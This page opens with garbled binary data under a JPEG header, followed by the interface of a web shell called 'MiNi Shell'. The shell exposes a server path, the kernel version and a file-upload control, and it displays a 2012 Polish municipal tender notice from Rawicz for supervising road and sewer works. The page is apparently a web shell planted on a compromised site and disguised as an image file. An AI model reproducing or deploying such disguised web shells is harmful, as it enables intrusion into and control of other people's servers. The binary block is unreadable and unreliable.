JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121019/222925-N-2012.html

<p class="kh_header"><b>Rawicz: Sprawowanie nadzoru inwestorskiego nad realizacją zadań 
inwestycyjnych drogowych</b><br>
<b>Numer ogłoszenia: 222925 - 2012; data zamieszczenia: 19.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawowanie nadzoru inwestorskiego nad realizacją zadań 
inwestycyjnych drogowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia  jest pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją zadań inwestycyjnych 
w zakresie: przebudowy  ul. Witosa wraz z odwodnieniem oraz  przebudowa ul. Miłej wraz z remontem kanalizacji deszczowej i sanitarnej oraz budowa chodnika - ciągu pieszo-rowerowego wzdłuż drogi krajowej nr 36 w Załęczu wraz z odwodnieniem, wraz z robotami towarzyszącymi tym zadaniom.         

2.	Szczegółowy opis robót przewidziany do nadzorowania dla zakresu 1 i 2 wynika z przedmiaru robót - stanowiących załączniki do specyfikacji istotnych warunków  zamówienia. 

Wobec tego w celu ustalenia wartości usług nadzoru należy zapoznać się z wymienionymi dokumentami. 
Niezależnie od powyższego w siedzibie Zamawiającego  pokój 111 można zapoznać się z projektami budowlanymi  dla tych zadań  Dokumentacje te są  również dostępne na stronie Zamawiającego www.rawicz.pl  (zakładka - zamówienia publiczne). 

3.	Osoba (osoby) pełniąca funkcję inspektora nadzoru inwestorskiego nad zadaniem  musi posiadać uprawnienia budowlane w zakresie branży  drogowej  oraz zapewnić (jeżeli nie posiada tych uprawnień) dodatkowo sprawowanie nadzoru przez osoby posiadające uprawnienia w innych występujących branżach ( kanalizacyjna ).
W przypadku gdy dla każdej ze specjalności  będzie to inna osoba głównym inspektorem nadzoru (KOORDYNATOREM) będzie osoba posiadająca uprawnienia budowlane w branży drogowej.    


4.	Wykonawca pełni czynności inspektora nadzoru inwestorskiego zgodnie z  art. 25 - 27 ustawy z dnia 7 lipca 1994r. Prawo budowlane (t.j.  Dz. U. z 2010 r  Nr  243  poz. 1623 z późniejszymi  zmianami )  w szczególności:
1)	reprezentuje Zamawiającego - Inwestora na budowie przez sprawowanie kontroli zgodności realizacji inwestycji 	
        z projektami i pozwoleniami na budowę,  aktualną wiedzą techniczną, przepisami prawa obowiązującymi w tym  	zakresie w szczególności Prawem Budowlanym, Polskimi Normami, specyfikacją techniczną wykonania i odbioru 	robót budowlanych, oraz umową o realizację inwestycji w ścisłym porozumieniu z inwestorem,
2)	sprawdza jakość wykonanych robót i wbudowanych wyrobów budowlanych oraz urządzeń, a w szczególności  zapobiega zastosowaniu wyrobów wadliwych i niedopuszczonych do stosowania w budownictwie, 
3)	sprawdza i odbiera roboty budowlane ulegające zakryciu lub zanikające (potwierdzając ten fakt w dzienniku budowy),  uczestniczy w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowuje i bierze udział w czynnościach odbioru gotowych obiektów budowlanych lub ich części (etapów) jak również bierze udział w przekazywaniu ich do użytkowania,
4)	potwierdza faktycznie wykonane roboty oraz usunięcie wad,  a także, na żądanie inwestora, kontroluje rozliczenie budowy.
5)	wydaje kierownikowi budowy lub kierownikowi robot polecenia, potwierdzone wpisem do dziennika budowy, dotyczące: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających  odkrycia robot lub elementów zakrytych, oraz przedstawienie ekspertyz dotyczących  prowadzonych  robot budowlanych  i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych  oraz urządzeń technicznych,
6)	żąda od kierownika budowy lub kierowników robot budowlanych dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych  robot budowlanych  w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować  niedopuszczalną niezgodność z projektem  lub pozwoleniem na budowę .

7)	Oprócz wyżej wymienionych obowiązków na Wykonawcy  ciąży :
	
a)	udział w pracach przy przekazaniu placu budowy,
b)	przestrzeganie postanowień zawartych w umowie o roboty budowlane pomiędzy Zamawiającym  
a Wykonawcą;
c)	ustalanie postępu robót w stosunku do terminów określonych w umowie, 
d)	kontrolowanie prawidłowości prowadzenia dziennika budowy i dokonanie w nim wpisów stwierdzających 
		wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robot,
e)	sprawdzanie w terminie 7 dni od dnia przekazania faktur częściowych i końcowej wraz z protokołami odbioru 
	wykonanych robót w danym okresie przedkładanych przez wykonawcę robót,
f)	sprawdzanie kalkulacji, kosztorysów powykonawczych  i zamiennych oraz obmiary robót przedkładanych  
		przez Wykonawcę robót,
g)	podejmowanie działań w celu dotrzymania terminu realizacji budowy,
h)	monitorowanie  budowy oraz realizacji  umowy zgodnie  z harmonogramem finansowo - rzeczowym (jeżeli 
		będzie wymagany harmonogram)
i)	zgłaszanie Zamawiającemu konieczność  wykonania robót dodatkowych i uzupełniających,
j)	ocenianie konieczności zmian i przedstawianie ich do akceptacji Zamawiającemu, a po uzyskaniu pisemnej 
		aprobaty Zamawiającego i podpisaniu stosownej umowy, wydawanie poleceń wykonania robót zamiennych 
i dodatkowych,
k)	w uzgodnieniu z Zamawiającym negocjowanie wynagrodzenia za roboty zamienne i dodatkowe 
z Wykonawcą robót,  których wynik musi być akceptowany na piśmie przez Zamawiającego,
l)	przygotowanie do akceptacji Zamawiającemu ewentualnego wydłużania czasu trwania umowy oraz 
		ewentualnego zwiększenia ceny robót,
m)	egzekwowanie od Wykonawcy robót dokumentów wymaganych w umowie (atesty, inwentaryzacje itd.)
n)	rozwiązywanie problemów i sporów powstałych w trakcie realizacji robót,
o)	weryfikacja dokumentów rozliczeniowych Wykonawcy robót i przedstawienie ich Zamawiającemu 
do akceptacji, 
p)	potwierdzenie wniosku Wykonawcy skierowanego do Zamawiającego o zakończeniu realizacji zamówienia,
q)	udział w odbiorze końcowym, sprawdzanie przekazywanej przez Wykonawcę robót dokumentacji 
		powykonawczej  wraz z niezbędnymi dokumentami wynikającymi z obowiązujących przepisów prawa oraz 
		umowy,  
r)	nadzór na robotami dodatkowymi i uzupełniającymi do wysokości 10% wartości  robót 
s)	udział w przeglądzie pogwarancyjnym i po okresie rękojmi zgodnie z warunkami i terminami określonymi 
w umowie na realizację robót, w szczególności Inspektor nadzoru będzie uczestniczył w przeglądach gwarancyjnych  i nadzorował usuwanie stwierdzonych wad i usterek w tym okresie.

8)	Obowiązkiem Wykonawcy jest zapewnienie kompleksowego nadzoru nad całością robót w zakresie nadzoru   inwestorskiego poprzez zapewnienie odpowiednio wykwalifikowanego personelu niezbędnego do wykonania przedmiotu zamówienia. Osoby wyznaczone do pełnienia czynności inspektora nadzoru w poszczególnych wymaganych branżach muszą posiadać uprawnienia budowlane w danej specjalności oraz być członkami właściwych izb samorządu zawodowego (aktualne zaświadczenie o wpisie).   
9)	Wymagania dotyczące zasad prowadzenia robót jak również ogólne wymagania dotyczące wykonania i odbioru robót nad którymi Wykonawca będzie sprawował nadzór inwestorski zostały określone w specyfikacjach technicznych wykonania i odbioru robót budowlanych,  projektach budowlanym dla wymienionego  zadania oraz wynikają z  Polskich Norm.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZAMAWIAJĄCY  przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust.1 pkt  6  ustawy, stanowiących  
         nie więcej niż   50 %  wartości zamówienia podstawowego (dla każdego zakresu)  polegającego na powtórzeniu tego 
	samego rodzaju zamówień,    w okresie 3 lat od udzielenia zamówienia  podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych  warunków  w tym zakresie.  Ocena spełnienia powyższych warunków  dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych  warunków  w tym zakresie.  Ocena spełnienia powyższych warunków  dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych  warunków  w tym zakresie.  Ocena spełnienia powyższych warunków  dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych  warunków  w tym zakresie.  Ocena spełnienia powyższych warunków  dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych  warunków  w tym zakresie.  Ocena spełnienia powyższych warunków  dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniona i podpisana przez Wykonawcę oferta przetargowa (załącznik nr 1 do SIWZ).
2)	Oryginał pełnomocnictwa do reprezentowania ( o ile ofertę składa pełnomocnik)  lub kopia pełnomocnictwa poświadczona przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach :

1)	wystąpienie usług dodatkowych, których wykonanie uzależnia wykonanie zamówienia podstawowego,
2)	na uzasadniony wniosek Wykonawcy (Inspektora Nadzoru)  zaakceptowany przez Zamawiającego i pod warunkiem, że zmiana ta wynika z okoliczności których Wykonawca (Inspektor Nadzoru) nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona 
3)	wystąpienie zdarzeń wymuszających w przerwę w realizacji zamówienia niezależnych od WYKONAWCY,
4)	wprowadzenie lub zmiana zgłoszonego w ofercie zakresu zamówienia wykonywanego przy udziale Podwykonawcy,
5)	zmiana stawki podatku VAT,
6)	zmiana terminu realizacji zamówienia,
7)	zmiana wartości umowy w przypadku zmniejszenia zakresu robót do nadzorowania powyżej 10 % ich wartości, 
8)	przekształcenie którejkolwiek ze stron umowy,
9)	zmiany personelu WYKONAWCY (Inspektora Nadzoru) i ZAMAWIAJĄCEGO za uprzednią zgoda ZAMAWIAJĄCEGO (np. osoby odpowiedzialne za realizację zamówienia, ),
10)	warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna i niezbędna dla ZAMAWIAJĄCEGO,
11)	innych niezbędnych zmian pod warunkiem, że są korzystne i niezbędne dla ZAMAWIAJĄCEGO</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego - w Urzędzie Miejskim Gminy Rawicz, ul. Piłsudskiego 21, 63-900 Rawicz, pokój 111 - po wpłaceniu należności w kasie Urzędu lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2012 godzina 10:00, miejsce: w siedzibie Zamawiającego - sekretariacie Urzędu Miejskiego Gminy Rawicz, 63-900 Rawicz, ul. Piłsudskiego 21 pokój 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowe ze środków Unii Europejskiej. 2. Wszelkie oświadczenia, wnioski, zawiadomienia, wezwania oraz inne informacje i dokumenty w postępowaniu o udzielenie zamówienia ZAMAWIAJĄCY i WYKONAWCY przekazują pisemnie. 3. ZAMAWIAJĄCY dopuszcza również możliwość porozumiewania się OBU STRON (Wykonawca, Zamawiający) za pomocą: faksu (65) 546-41-67 oraz poczty elektronicznej przetargi@rawicz.pl 4. Jeżeli ZAMAWIAJĄCY lub WYKONAWCA przekaże faksem lub pocztą elektroniczną dokumenty lub informacje, o których mowa wyżej, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania. 5. Zamawiający nie przewiduje zawarcia umowy ramowej. 6. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów. 7. Zamawiający nie przewiduje określania w opisie przedmiotu zamówienia wymagań związanych z realizacją zamówienia o których mowa w art. 29 ust. 4..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZAKRES 1. Przebudowa ul. Witosa wraz z odwodnieniem oraz przebudowa ul. Miłej wraz z remontem kanalizacji deszczowej i sanitarnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia i do nadzorowania obejmuje  w szczególności: 

ZAKRES 1. Przebudowa ul. Witosa wraz z odwodnieniem oraz przebudowa ul. Miłej wraz z remontem  kanalizacji deszczowej i sanitarnej.
 
1)	Przebudowa ulicy Witosa o długości około 112,20 m w szczególności: 
a)	rozbiórka istniejących elementów drogi, 
b)	wykonanie nowej jezdni o nawierzchni z betonu asfaltowego (powierzchnia ok. 653,32 m2),
c)	wykonanie nowych chodników i zjazdów o nawierzchni z kostki betonowej brukowej (powierzchnia ok. 369,00 m2) 
d)	regulacja wysokościowa studzienek dla włazów kanałowych oraz zaworów wodociągowych i gazowych zlokalizowanych w istniejącym pasie drogowym,
e)	wymiana hydrantu p/pożarowego nadziemnego na podziemny oraz wymiana 3 wpustów ulicznych, 
f)	wykonanie oznakowania poziomego i pionowego oraz na czas prowadzenia robót.

2)	Przebudowa ulicy Miłej o długości około 307,50 m w szczególności: 
a)	rozbiórka istniejących elementów drogi wraz z rozbiórką sieci kanalizacji sanitarnej ,
b)	wymiana sieci kanalizacji deszczowej z przykanalikami (długości ok. 349,10 m) wraz ze studniami i wpustami ulicznymi 
c)	wymiana sieci kanalizacji sanitarnej z wraz z przyłączami (długość ok. 397,70 m) wraz z uzbrojeniem w studnie rewizyjne,
d)	wykonanie nowej jezdni o nawierzchni z betonu asfaltowego (powierzchnia ok. 1.847,05 m2),
e)	wykonanie nowych chodników i zjazdów o nawierzchni z kostki betonowej brukowej (powierzchnia ok. 1.116,80 m2) 
f)	regulacja wysokościowa studzienek dla włazów kanałowych oraz zaworów wodociągowych i gazowych zlokalizowanych w istniejącym pasie drogowym,
g)	wymiana hydrantu p/pożarowego nadziemnego na podziemny,
h)	wykonanie oznakowania poziomego i pionowego oraz na czas prowadzenia robót

W ramach niniejszego zamówienia  Wykonawca zapewnia nadzór inwestorski w pełnym zakresie we wszystkich występujących branżach,  w tym w szczególności: drogowa, kanalizacyjna - sanitarna.  

Termin wykonania przez Wykonawcę robót do 30.05.2013 roku, z tym I etap zamówienia - remont kanalizacji deszczowej i sanitarnej w ulicy Miłej  do 14.12.2012 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZAKRES 2. Budowa chodnika - ciągu pieszo-rowerowego wzdłuż drogi krajowej nr 36 w Załęczu wraz z odwodnieniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia  do nadzorowania obejmuje  w szczególności: 
1)	rozbiórkę istniejących elementów drogi,
2)	przebudowę kablowych linii telekomunikacyjnych,
3)	regulację pionową studzienek oraz hydrantu podziemnego,
4)	budowę chodnika - ciągu pieszo-rowerowego wraz ze zjazdami w pasie chodnika, o łącznej powierzchni ok. 2987 m2, z betonowej kostki brukowej bezfazowej gr. 8 cm,
5)	budowę kanalizacji deszczowej - długości ok. 400 m,
6)	odtworzenie rowu drogowego wraz z budową przepustów pod zjazdami,
7)	wycinkę drzew kolidujących z projektowanym układem drogowym - przewidziano 12 szt. drzew oraz nasadzenie nowych,
8)	wykonanie oznakowania poziomego i pionowego oraz montaż urządzeń zabezpieczających ruch pieszych.
          
W ramach niniejszego zamówienia  Wykonawca zapewnia nadzór inwestorski w pełnym zakresie we wszystkich występujących branżach,  w tym w szczególności: drogowa, kanalizacyjna.  

Termin wykonania przez Wykonawcę robót do 30.05.2013 roku. 
Zadanie wykonywane będzie wspólnie z Generalną Dyrekcją Dróg Krajowych i Autostrad, na podstawie porozumienia z dnia 09 października 2012 r., zgodnie z którym GDDKiA przekazuje do realizacji zadania m.in.: kostkę gr. 8 cm szarą, obrzeże, wpusty uliczne, włazy żeliwne, rury PVC itp. 
Zakres, ilość oraz opis przekazanych materiałów zawarto w kosztorysie zerowym stanowiącym załącznik do niniejszej Specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com